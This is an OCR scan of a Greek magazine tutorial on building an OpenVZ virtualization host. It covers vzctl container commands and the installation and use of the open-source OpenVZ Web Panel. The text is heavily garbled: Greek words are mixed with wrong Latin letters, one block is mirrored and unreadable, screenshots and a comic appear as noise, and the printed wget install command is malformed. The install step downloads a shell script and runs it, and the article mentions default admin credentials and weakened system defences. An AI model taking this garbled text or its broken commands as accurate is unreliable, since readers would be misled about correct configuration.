ηγουμένως va κατεβάσουµε το αντἰστοιχο template. Σημειώστε OT! Ta 
templates τοποθετούνται πάντα στον κατάλογο /vz/template/cache. Eni- 
σης, έχετε υπόψη OT! εφόσον κατεβάσουμε κάποιο template, μπορού- 
µε να το χρησιμοποιήσουμε για τη δημιουργία όσων εικονικών μηχανών 
θέλουμε. Εμεὶς λοιπὀν κατεβάσαµε το “πρότυπο” για το Ubuntu 12.04. 
Ὅταν ολοκληρώθηκε η λήψη, δημιουργήσαμε επιτέλους την πρώτη µας 
μηχανη: 


vzctl create 101 --ostemplate ubuntu-12.04-x86 --config basic 


Αυτὸ ἦταν ὀλο! Οι EIKOVIKEG μηχανές δημιουργούνται πανεύκολα, EKTE- 
λὠντας το vzctl µε τις κατάλληλες παραμέτρους. Συγκεκριµένα, αρκεί να 
δηλώσουμε vav αναγνωριστικὀ αριθμὀ για τη νέα μηχανὴ (ονομάζεται 
ID), να καθορίσουμε To template που θέλουμε να χρησιµοποιηθεί και va 
προσδιορίσουμε Eva σύνολο ρυθμίσεων. Το σύνολο ρυθµίσεων καθορἰ- 
ζεται ano την τελευταία παράμετρο του παραδεἰγματός µας, και εἶναι TO 
basic. Πρόκειται για Eva ano τα ἐτοιμα σύνολα ρυθµἰσεων του OpenVZ 
και μπορείτε να το φαντάζεστε ως Eva preset, για την τελική μορφὴ της 
εικονικἠς μηχανής. Αργότερα θα το συναντήσουμε πάλι, αλλά για την 
ώρα δεν χρειάζεται να ασχοληθούμε μαζί του περισσότερο. Ας δούµε pE- 
PIKEG ακόμα ρυθμίσεις: 


vzctl set 101 --hostname ubuntu --save 
vzctl set 101 --ipadd 192.168.1.201 --save 
vzctl set 101 --nameserver 192.168.1.1 --save 


Ὅπως καταλαβαίνετε, µε την εκτέλεση των παραπάνω PUBHIZOUHE τις 
βασικὲς παραμέτρους για τη δικτύωση της εικονικής μηχανής. Πα την 
ακρίβεια, ορἰζουμε το επιθυμητὀ hostname!, προσθέτουμε στην εικονικἠ 
μηχανή ἑνα δικτυακὀ interface µε τη διεύθυνση 192.168.1.201 και õn- 


1. Όπως βλέπετε η ἐμπνευσή µας εἶχε στερέψει και χρησιμοποιήσαμε σαν hostname το (καθόλου πρωτότυπο) 
ubuntu! 


Έχουμε φτιάξει Eva 
virtual machine 
βασισμένο στο 
Ubuntu 12.04 
template και µε τη 
βοήθεια Tou htop, 
παρατηρούμε την 
επἰδρασή του στο 
σύστημα. Όπως 
βλέπετε, η εικονική 
μηχανή εἰναι idle 
(δεν κάνουμε 
τίποτα σε αυτήν) 
και ως εκ τούτου η 
λειτουργία της δεν 
επιβαρύνει καθὀ- 
λου το σύστημα! 
Το OpenVZ πετυ- 
χαίνει εξαιρετικἀ 
καλή διαχείριση 
των πόρων του 
συστήματος... 
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j δὲ Dashboard - OpenVZ Web x a 


B General 


€ > @ fi Π 192.168.1.100:3000/admin/dashboard 


Dashboard 
IE] Physical Servers 
(@ locathost 


Ἐ PP Addresses 


OpenVZ Web Panel is a GUI web-based frontend for controlling of physical servers with OpenVZ virtualization 
technology. 


a| My Profile 

& users You logged in as George (admin). 

CD Requests 

wie Parameter | Value | 

ΕΕ Events Log τπτ - 

& Logout [8 Physical servers 1 

8) Help [8 Virtual servers 4 

(© Documentation @ Running virtual servers 4 

XE support © Stopped virtual servers o 
8 Expired virtual servers o 
(© Opened requests ο 


x 


A 


To dashboard ano- 
τελεί την αρχικἠ 
σελίδα του web 
panel. Ano εδώ 
αποκτάµε µια yE- 
νικὴ εικόνα για τις 
EIKOVIKEG μηχανές, 
τα OpenVZ nodes 
που ενδέχεται να 
υπάρχουν στο 
δίκτυό µας, τους 
χρήστες του panel 
και πάει λέγοντας... 


82 


λώνουμε τη διεύθυνση του nameserver? του δικτύου µας. Μέχρι στιγµἠς 
έχουμε δημιουργήσει µια εικονικἠ μηχανὴ, έχουμε πραγματοποιήσει µερι- 
κἐς βασικὲς ρυθμίσεις, αλλά δεν την έχουμε ενεργοποιήσει. Ας το δούμε 
κι αυτό: 


vzctl start 101 
vzctl exec 101 passwd 


Με την εκτέλεση της πρώτης γραμμής υπαγορεύουμε στο OpenVZ va 
ενεργοποιἠσει την εικονικἠ μηχανὴ µε το ID 101. H δεύτερη γραμμὴ kå- 
νει KATI που θα σας παραξενέψει στα σίγουρα: Εκτελεί µια εντολή στο 
εσωτερικό” της μηχανής, χωρίς να έχουμε συνδεθεἰ σε αυτήν! Όπως 
βλέπετε, ζητάμε ano το vzctl να εκτελέσει το προγραμματάκι passwd, για 
να ορίσουµε τον κωδικό του χρήστη root. Αφού δώσουμε vav κωδικό, 
μπορούμε πλέον να συνδεθούµε στη μηχανή, δίνοντας κάτι τέτοιο: 


vzctl enter 101 


Πα να επιστρἐψουµε στην κονσόλα του host OS (δηλαδἠ Tou CentOS), 
αρκεἰ να δώσουμε Eva exit. Φυσικά, απὀ τη στιγµή που έχουμε ενερ- 
γοποιήσει την εικονικἠ μηχανὴ και έχουμε ορίσει Eva γνωστό password 


2. Ουσιαστικἁ πρὀκειται για TO ρουτεράκι µας ;-) 
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IP Addresses - OpenVZ We x 
p 


€ > CŒ 4 |O 192.168.1.100:3000/admin/ip-addresses/list 
| @ OpenVZ Web Panel 2.1 
| 
items <| fæ IP Addresses 


(J General 


Dashboard --- — 
. | |_| IP pools list 
g Physical Servers f 

| © Create P Pool (5) 

(@ iocalhost ] 


| cs dress a 


|E IP Addresses | E | 192.168.1.201 192.168.1.250 46 4 50 


Q Search Ü Up Level 


ΑΦ 


5 My Profile 

& users | 

= | 

CA Requests | 

[ο] Tasks | «| -- ΜΝ ΠΝ 
| f 
| =} Events Log | |_] IP addresses list 

| 

& Logout | IP Address a Virtual Server Physical Server 
| Β) Help 192.168.1.151 ubuntu localhost 
| 192.168.1.152 minecraft localhost 

© Documentation 
| 192.168.1.153 light localhost 
| WS support 192.168.1.154 ubuntu-12-04-test localhost 
| 
| 
L 


κ 


3 
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για το χρήστη root, μπορούμε va συνδεθούµε σε αυτήν µέσω SSH. Ava- 
ρωτιέστε ποια εἶναι η διεύθυνση της εικονικἠς μηχανής; Μα, αυτή που 
δηλώσαμε παραπάνω (192.168.1.201). Τέλος, σημειώστε ὁτι η εκκίνηση, 
ο τερματισμὀς και η επανεκκίνηση µιας εικονικἠς μηχανής, πραγµατοποι- 
οὐνται ακόµα κι αν δεν έχουμε συνδεθεἰ σε αυτήν. Αρκεί να γνωρίζουμε 
το αντίστοιχο ID και να τρέξουµε το vzctl µε την κατάλληλη παράμετρο. 
Στο παρἀδειγμἁ µας, η εικονική μηχανὴ ἐχει σαν ID το 101. Επομένως, 
θα μπορούσαμε να εκτελέσουµε τα ακόλουθα, µε προφανεὶς συνέπειες: 


vzctl start 101 
vzctl stop 101 
vzctl restart 101 


Απομακρυσμένη διαχείριση 


Πρέπει να παραδεχτεἰτε OT! η διαχείριση των εικονικὠν μηχανών ano την 
κονσόλα δεν εἶναι δύσκολη. Μπορεἰ να εἶναι ἄσχετη µε ὁσα έχουμε συνη- 
θίσει, αλλά ταυτόχρονα εἶναι και απλἠ. Ωστόσο, μπορούμε να την κάνου- 
µε ακόµα πιο απλἠ! Μπορούμε να διαχειριζόὀµαστε τις EIKOVIKEG μηχανὲς 
μέσω ενός web interface και κάνοντας µόνο λίγα κλικ. Πα την αποµακρυ- 
σμένη διαχείριση του OpenVZ προσφέρονται πολλά web panel, μεταξύ 
των οποίων κι αρκετά εµπορικἀ. Εμεὶς OTPAMNKAHE σε εκείνα του Avol- 
XTOU Κώδικα και ξεχωρίσαµε το λεγόμενο OpenVZ Web Panel. H ομορφιά 
του µπορεί να µην συγκρἰνεται µε εκείνη των εμπορικών λύσεων, αλλά 
αποτελεί µια αξιόλογη προσπάθεια -- χώρια που εἶναι και δωρεάν! Πα την 
εγκατἀστασὴ του αρκεἰ να εκτελἐέσουµε τα ακόλουθα: 


wget -O http://ovz-web-panel.googlecode.com/svn/installer/ai.sh 


sh ai.sh 


Έχοντας ορίσει Eva 
IP pool µέσα ano 
To web panel, οἱ 

EIKOVIKEG μηχανές 
µας θα παίρνουν 
αυτόματα κάποια 
ano τις επιτρεπὀ- 
µενες διευθύνσεις 
IP! 


93 


VHAQKER 


ÁN 


Ουσιαστικἀ, µε TO wget κατε- 
βάζουμε éva installation script 
(το ai.sh) και μετά το εκτελούμε 
(δίνοντας sh ai.sh). Το εν λόγω 
script θα τρέξει αρκετὲς εντολὲς 
και προγραμματάκια, θα προσθέ- 
σει στο σύστημα διάφορα πακὲ- 
τα και τελικἀ θα εγκαταστήσει TO 
web panel. Τώρα, αν υποθέσουμε 
ὁτι το μηχάνημα που EXOUHE pE- 
= τατρέψει σε OpenVZ node ἐχει τη 
διεύθυνση 192.168.1.100, puno- 
ρούμε να επισκεφθούμε το web 
panel μεταβαίνοντας στη θέση: 
http://192.168.1.100:3000. Εκεί 
θα µας υποδεχθεί το login prompt 
του panel και θα πρέπει να συν- 
δεθούμε, Χρησιμοποιώντας σαν 
username και password το “admin” 
(χωρίς Ta εισαγωγικἀ). Όπως KaTa- 
λαβαίνετε, αν και όλα αυτά βρἰσκο- 
νται στο τοπικὀ µας δίκτυο, καλὸ 
θα εἶναι να αλλάξουμε το default 
password, το ταχύτερο δυνατὀ. Εἰ- 
ναι (κι αυτὀ) ζήτημα τάξης και KA- 
Ans συνήθειας |) 
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Χρήση του web panel 
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Ἴσως κάποιοι ano εσάς va avapw- 
τιούνται γιατὶ δεν αναφερθήκαμε 
εκτενώς στις παραμέτρους του 
vzctl. Η αλήθεια εἶναι πως πρὀκειται 
για ἑνα εργαλείο µε πάρα πολλές” 
δυνατότητες και επιλογές. Ωστόσο, 
εμείς δεν εἰχαμε OTOXO την απὀλυ- 
τη εξοικείωση µε TO OpenVZ, αλλά 
την εὐκολη δημιουργία μερικὠν 
εικονικὠν μηχανών. Αν αποφασὶ- 
ζαμε να γίνουμε VPS provider, θα 
εμβαθύναμε στο vzctl χωρίς καμία 
αμφιβολία! Μέχρι τότε, όμως, δεν 
υπάρχει κανένας λόγος να δυσκο- 
λέψουμµε τη ζωή µας. Εξάλλου, για 
τον ἰδιο λόγο εγκαταστήσαμε και TO 
web panel. 
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ϑθχ-ῃ΄ϑ-υεια9ρ. 
AML UOIdI3XDIQ H ᾿'3ΠΠΟΟ{ΙΟΌΙΌΧΙΛ3 OL DA 2ΩΛΒΠΙΠΟΛ 


9θχ-ρο΄Ζι-πίυπαπ. 
9θχ-σ0΄ζι-πίυπαπ. 
31ΕΙόµΙ81 SO 


Οι επιλογές που προσφέρει το 
OpenVZ Web Panel εἶναι επἰσης 
πολλὲς και εἶναι βέβαιο ὁτι οι πε- 
ρισσότερες δεν θα µας χρειαστούν 
ποτὲ. Όπως εἶπαμε παραπάνω, την 
πρώτη Popa nou θα συνδεθού- 
µε εἶναι φρόνιμο να αλλάξουμε το 
password του χρήστη admin. Μετά 


aeg vogedx3 


19υλ0 
41013 ‘OLND 3ΙΏΛ3ΠΙΟΞΗ OL ΛΑΥ 


nody “η5οι[[Ε2οι) UAoyiuz bin oaon 3rlnou3yg 
5ΙΘΛΙ85 /22ISÁŅd DLOIY ULO OLND ,IA IDM Θροι OIOLZL 


d: 
“SUADXUN ΟΙΙΜΙΛΟΧΙ3 9503A SUL DIAdNOIrUQ UL 3ΠΠοο 


-Lodu 13u3duU ‘prULonoO OLO 13XdDLIN A3Q OJOLIO OL 
816|4α191 SO ΟΙΟΙΡΧ 3ΠΙΠοοΙΙΟΗΟΠΙΟΙΙΧ ΟΛ 3ΠΠΟΥ30Θ 
AY ΙΘΛ.ΙΘ5 |ΒΠ}ΙΛ Θ1ΘΒΘΙΏ ΟΠΟ3ΟΛΠΟ OLO SDLAMLDU 
-UAIA39 ΟΛ 3rinodour ‘SUL MADUZ AIYA 3ΠΙΠΟΛΡΧ 
DA3 ΟΛΟΠ 3ΠΠΟΧ3 5133 'Ι39ἰΙΛόποΙιΠΙιο Dg orouo 
AOLO Θροι ΖΛιθαο AOL 3ΠΠΟΞΦ3ΥΙΗ3 DA DLU 1311 
-30du ΦΙΛΟΧΙΙΠ 2Ι/ΙΛΟΣΙ3 203Λ ΡΙΠ UxUgoodu AUL DI] 
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OpenVz: AK-47s, for everyone! (μέρος 2) 
OLLI κα ἽἌἽ“Ἂ“ἊἊακ 


an’ auth την αλλαγή, εἶναι χρήσι- 


- ᾿ © Create new virtual server 
HO να μεταβούμε στην περιοχή IP 


Addresses. Ano εκεἰ μπορούμε va | Main Settings || Additional Settings 
ορίΐσουµε Eva εὖρος διευθύνσεων, ae == 
το οποίο θα Χρησιμοποιείται για τις 
εικονικἐς μηχανές. Εδώ μπορού- Server ID (VEID): 102 
µε va δηλώσουμε TO εὗρος and OS Template: ubuntu-12.04-x86 |v 
192.168.1.201 έως 192.168.1.250, Ἵν 
στο οποίο καταλήξαμε μετά τη pE- μερος manasa te 
AETN των ρυθμίσεων TOU οικιακού Description: lighttpd + mysal 
router και συγκεκριµένα του DHCP 
server. Κάνοντας κάτι τέτοιο, Οι ο... 
εικονικὲς μηχανές µας θα απο- 
KTOUV αυτόματα διεύθυνση IP και IP Address: auto Mm 
μάλιστα εντὸς της επιθυµητής NE- Host Name: webserver 
ριοχῆς! Σημειώστε οτι Οἱ περιοχες 
διευθύνσεων ονομάζονται IP pools. 
System Access 


Επομένως, για τη δουλειά που εξε- 
τάζουμε πρέπει να πατήσουμε το Root Password: Sean 
Create IP pool. Εκεἰ θα δηλώσουμε 


: i B Confirm Password: seeseees 
την πρώτη και την τελευταία διεύ- 
θυνση της επιθυµητής περιοχἠς... Owner: admin η 
H δηµιουργἰα ενὸς virtual machine 
μέσα ano το web panel εἶναι πανεύ- 
κολη. Apxikd, ano τη λίστα των δι- |- Ccreate | |- E cancel | 


αθέσιµων server (εμφανίζεται στην 
αριστερἡ περιοχή του panel) επιλέγουμε το localhost. Έτσι, λέμε στο web 
panel να χρησιμοποιήσει τον τοπικὀ OpenVZ node. Κατόπιν, ano την Kå- 
τω-δεξιά περιοχἠ του panel, κάνουμε κλικ στο Create virtual server. Με 
αυτὸν τον τρόπο εμφανίζεται Eva νέο παράθυρο. Ano εκεί μπορούμε να 
ορίσουμε τις βασικὲς ιδιότητες για τη νέα μηχανή. Νομίζουμε ὁτι τα ne- 
ρισσότερα πεδία που θα Seite σε αυτὀ το παράθυρο δεν χρειάζονται καμία 
ιδιαίτερη εξήγηση. Ωστόσο, αξίζει να πούμε δυο λόγια για To OS template 
και το Server template. Το πρῶτο αποτελεί το πρότυπο της διανομής που 
θέλουμε να εγκαταστήσουμε. Σε AUTÒ το στάδιο, αν πατήσετε το βελάκι 
για να δείτε τη λίστα µε templates (πρὀκειται για drop-down menu), θα 
βρείτε μόνο To Ubuntu 12.04. Φυσικά, αν *dev* ἐχετε ακολουθήσει κατὰ 
βήμα ὁσα έχουμε πει μέχρι τώρα, *Sev* θα βρείτε κανένα template. Σε 
κάθε περίπτωση, για να χρησιμοποιήσουμε κάποιο ἆλλο template, πρέπει 
να TO εγκαταστήσουμε. Δυστυχώς ὁμως αυτὸ δεν µπορεἰ να γίνει ano 
εδὠ. Θα πρέπει λοιπὸν να κλείσουμε το παραθυράκι δημιουργίας νέας 
εικονικἠς μηχανής και να πατήσουμε στο σύνδεσμο Server Templates 
(εμφανίζεται στη δεξιά περιοχἡ Tou panel και σχεδὸν στην κορυφὴ της). 
Ἔτσι θα μεταβούμε στην περιοχή διαχείρισης των templates. And εδὠ 
μπορούμε να εγκαταστήσουµε αυτόματα οποιοδήποτε θέλουμε. Το web 
panel θα αναλάβει να κατεβάσει το template της επιλογἠς µας και μόλις 
τελειώσει η λήψη, θα μπορούμε να το βρούμε στη λίστα µε τα διαθέσιμα 
OS templates. Εἶναι λίγο περἰπλοκη η διαδικασία, έτσι; H αλήθεια εἶναι ὁτι 
το συγκεκριµένο web panel δεν θα κἐρδιζε εὐκολα βραβείο ευχρηστίας. 
Ωστόσο, εἶναι καλύτερο απὀ τις υπόλοιπες, δωρεὰν λύσεις! 


Όταν εἰδαμε τη δημιουργία εικονικών μηχανών απὸ τη γραμμὴ εντολών, 
αναφερθήκαμµε στο σύνολο ρυθμίσεων µε το ὀνομα basic. Στην πραγµα- 


3.. Όχι ότι έχουμε και άλλα nodes, αλλά αυτό δεν το γνωρίζει το web panel. 


Κατά τη δηµιουργία 
µιας νέας εικονικής 
μηχανής, καλούμα- 
στε να εισάγουµε 
ορισμένες βασικές 
παραμέτρους. 
Νομίζουμε OT! μετά 
την παρουσίασή 
μας, εἰσαστε σε 
θέση να τις KaTa- 
νοήσετε ὀλες :D 


VHAQKER 


ÁN 


r 


/ Ay Virtual server ubuntu-12-0: x \ 


€ > Œ 4 [Π 192.168.1.100:3000/admin/virtual-servers/show?id=7 


Dashboard 
8 Physical Servers 
| localhost 
JE IP Addresses 
ΒΞ! My Profile 

δ Users 
ῷ Requests 
8 Tasks 
a Events Log 
σὲ Logout 
5 Help 
@ Documentation 


W support 


Parameter 
CPU load average 
Disk usage 7%, 2.7 GB of 36.1 GB / 33.4 GB free 


1%, 4.7 MB of 272 MB / 267.3 MB free 


Memory usage 


Parameter 
Server ID (VED) 
Status 


ubuntu-12.04-x86 
Server Template basic 

IP Address 192.168.1.154 
Host Name ubuntu-12-04-test 
Disk Space, Mb unlimited 

RAM Memory, Mb 272 

CPU Units 1000 

DNS Server 192.168.1.1 
Description Ubuntu 12.04 TEST 


OS Template 


x 


+ 


Στην περιοχή IP 
Addresses εμφανί- 
ζεται και µία λίστα 
HE TIÇ ενεργές 
EIKOVIKEG μηχανές. 
Κάνοντας κλικ 
επάνω σε κάποια 
μεταβαίνουμε 
αυτόματα σε µια 
νέα περιοχή του 
panel, στην οποία 
προβάλλονται διά- 
φορες πληροφορί- 
ες για την εκάστοτε 
εικονική μηχανή. 
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τικότητα, πρὀκειται για Eva εἰδος template το οποίο δεν προσδιορίζει τη 
διανομή που θα τρέχει η εικονικἠ μηχανή, αλλά τη συμπεριφορά και τις 
δυνατὀτητὲς της. Στην ορολογἰα του OpenVZ, αυτὰ τα πρότυπα ονομάζο- 
νται server templates. Σε αυτὸ το σημείο θα μπορούσαμε να αρχίσουμε 
µια ατελείωτη περιγραφἠ των διαθέσιμων server templates, αλλά vopi- 
ζουμε ὁτι KATI τέτοιο θα ἦταν βαρετό. Θα σας αφήνουμε να ανακαλύψε- 
τε μόνοι σας τις ιδιαιτερότητες του καθενὸς, παϊζοντας µε το δικὀ σας 
OpenVZ node. 


Ev κατακλεἰδι 


τελικά To CentOS δεν εἶναι καθόλου δύσχρηστο, ενώ το yum --το εργα- 
λείο διαχείρισης πακέτων-- μοιάζει αρκετά µε το apt. Βέβαια το CentOS 
προορίζεται για server και γενικότερα για συστήματα στα οποία προέχει 
η ασφάλεια. Έτσι, µε στὀχο να µην υπάρξει κανένα πρόβλημα κατά τη 
λειτουργία του OpenVZ και τη δικτύωση των εικονικὠν μηχανών, ava- 
γκαστήκαμε να καταργήσουμε αρκετὲς απὀ τις γραμμὲς ἀμυνας του OU- 
στήματος. Πάντως, η ύπαρξη του yum αποτελεί αναγκαἰα προὐπόθεση 
για τη λειτουργία του OpenVZ Web Panel και, ως εκ τούτου, η επιλογἠ 
του CentOS ἡ του Fedora ἦταν σχεδόν υποχρεωτική. Εμεἰς επιλέξαμε το 
πρώτο, αφού µας πείθει περισσότερο για τη στιβαρὀτητὰἁ του”. 


Στην παρουσἰασἠ µας αναφερθἠκαµε μοναχὰ στις βασικὲς λειτουργίες 
του OpenVZ Web Panel. Αυτό έγινε κυρίως για δύο λόγους. Αφενός, οι 
προχωρημένες λειτουργίες του panel αφορούν σε προχωρημένες λει- 


4. Μια γνώμη λέμε! Δεν θέλουμε να ξεκινήσουμε flame war :P 


OpenVZ: AK-47s, for everyone! (μέρα 


ιά 


Toupyies του OpenVZ, οι οποίες εἶναι απίθανο να σας χρειαστούν. AQE- 
τἐρου, πολλὲς λειτουργίες του panel εἶναι κρυμμένες και γενικότερα το 
περιβάλλον δεν εἰναι καλά δομημένο. Έτσι, η περαιτέρω εμβάθυνση θα 
καταντούσε πολύ περιγραφικἠἡ και κουραστικἠ. Εἶναι πολύ προτιμότερο 
(και ευχάριστο ;-) να εγκαταστήσετε το panel και να το ξεψαχνίσετε uò- 
νοι σας! Χαρακτηριστικὀὸ παράδειγµα αποτελεἰ η δυνατότητα δηµιουρ- 
γίας γραφημάτων, µε τα OTATIOTIKA των εικονικών μηχανών. Μπορείτε 
να εντοπίσετε τη σχετικἠ επιλογή; Εμεὶς πάντως, για να µη λέτε ὁτι σας 
βάλαμε να ψάχνετε κάτι που δεν υπάρχει, θα σας την δείξουμε σε μία ano 
τις EIKOVEG του ἄρθρου :D 


Τελικά, µε σχετικἁ ελάχιστο KONO, ο Server µας εἶναι πανέτοιμος για va 
φιλοξενήσει ὁσα virtual machines θέλουμε. Εκτὸς ano τα updates Tou 
συστήματος, τα οποία θα ἦταν φρόνιμο να λαμβάνουμε σε τακτικἁ χρονι- 
Kå διαστήματα, το σύστημα δεν χρειάζεται τίποτα ἄλλο. Πλέον, μπορούμε 
να ξεκινήσουμε ὁσες διανομές Linux θέλουμε και να κἄνουμε ὁσα πει- 
ράματα θέλουμε. Εναλλακτικἁ, αν δεν θέλουμε να πειραματιστούμε και 
πολύ, μπορούμε va απλώσουμε τα διάφορα services του δικτύου µας σε 
ξεχωριστές EIKOVIKEG μηχανές και p’ αυτόν τον τρόπο, να εξερευνήσου- 
µε τις δυνατότητες και τις ιδιαιτερότητες διαφόρων διανομών. Σε κάθε 
περίπτωση, το OpenVZ node αποτελεἰ Eva πρὠτης τάξης εργαλεἰο και 
παιχνίδι, για όλους ὁσοι αγαπάνε το Linux, τα δίκτυα και την ασφάλεια... 
Σας αφήνουμε να το απολαύσετε! 


Τα γραφήματα εἰναι 
πάντοτε EVTUNW- 
σιακά. Αυτά εἰναι 

το πιο ενδιαφέρον 
κομμάτι του panel. 
Μας βοηθάνε να 
δούμε τις απαιτή- 
σεις Tou virtual 
machine µας αλλά 
και πως χρησιµο- 
ποιεί τους πόρους 
που του έχουμε 


3 Help 


®© Documentation 


Φε support 


| KMEMSZE 
LOCKEDPAGES 
PRIVVMPAGES 
SHMPAGES 
NUMPROC 
PHYSPAGES 
VMGUARPAGES 
OOMGUARPAGES 
NUMTCPSOCK 
NUMFLOCK 
NUMPTY 
NUMSIGINFO 
TCPSNDBUF 
TCPRCVBUF 


1821417 
0 
1017 


4825088 


14372700 
2048 
69632 
21504 
240 


256 
1720320 
1720320 


δώσει. 
tela |βαξξοη' 
Δὲ Virtual server ubuntu-12-0. 
€7c¢caiob 192.168,1.100:3000/admin/vi rtual-servers/stat_details?id=7 we Μι Ξ 
A OpenVZ Web Panel 2.1 
Menu s ah Virtual server ubuntu-12-04-test statistics 
3 General 
Dashboard 
ΕΠ! CPU usage 
E| Physical Servers - 
[8 locathost 
|E ΙΡ Addresses . 5 
25) My Profile 
& Users 
„ii O 515558 247 1215192226293438424650 5 
89 Tasks l- ] 
Events Log ΕΙ i . 
Parameter Current Use Max Use Barrier Limit Fails 
@ Logout 


14790164 0 
2048 0 
69632 0 
21504 0 
240 0 
9223372036854775807 0 
9223372036854775807 0 
9223372036854775807 0 
0 
0 
0 
0 
0 
0 


m 


360 


256 
2703360 
2703360 


|[ί----------- 


|192.168.1.100:3000/admin/hardware-servers/show?id=1# 
ς 


ENA χρονο 
T2PA MOY 
EPXOTAN TO 
FEPIOMIKO 
ME TO 
TAXY dPOMEIO 
KANONIFA.. 


KOITTAA TON 
TAXYdPOMO 
Τ/70Τ 4... 
TH AINA ETO 
TAXYAPOMEIO 
TIVIOTA.. 
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Ἐλεσ)ο: J.BARDAKOS - KEIMENO: BL. 


EIMAI O AAKHE 
AYTO EINAI TO PC MOY. 


mEYAXNA NA 
8P2 KATI 
΄ερεργο 

Το @AKEAO 
TINOTA.. 


TO 79) TO 
KATAAAGA: 
MITPOZTA ANO TO 
EATA XAKEP 
EXE! ENA 4EATA 


“EIMAI TO PC ΤΟ». 
AYTOE EINAI HAIOIOZE." 


O4-11-2012 WWW .LAKISCR.COM 


Η διαφήμισή σας θα 
μπορούσε να εἶναι εδώ. 


Θα μπορούσε va 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν εἶναι. 


Προς το παρόν. 


πέντως μν evepucéere: ΞΕΡΟυΜΕ ει CEPETE mx 
ξε POUULE on ξέρετε ει npener va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2us@deltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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